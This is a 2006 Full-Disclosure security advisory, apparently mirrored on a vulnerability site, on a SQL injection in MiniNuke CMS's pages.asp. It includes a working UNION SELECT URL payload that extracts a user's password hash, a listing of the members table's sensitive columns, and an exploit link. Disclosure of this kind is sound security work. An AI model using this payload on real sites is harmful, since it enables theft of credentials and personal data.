Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11529
HistoryFeb 21, 2006 - 12:00 a.m.

[Full-disclosure] MiniNuke CMS System all versions (pages.asp) SQL Injection

2006-02-2100:00:00
vulners.com
7

EDITED 20/02/2006
–Security Report–
Advisory: MiniNuke CMS System all versions (pages.asp) SQL Injection
vulnerability

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 19/02/06 10:31 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: MiniNuke (www.mini-ex.net) (www.mininuke.info)
Version: All versions released from this vendors.
About:Via this method remote attacker can inject SQL query to the pages.asp

How&Example:
GET -> http://[site]/pages.asp?id=1%20[SQLQuery]
Example ->
http://[site]/pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=1
So with this example remote attacker can get userid 1's hashed password.
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar

Exploit:
http://www.nukedx.com/?getxpl=9

Original advisory:
http://www.nukedx.com/?viewdoc=9


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/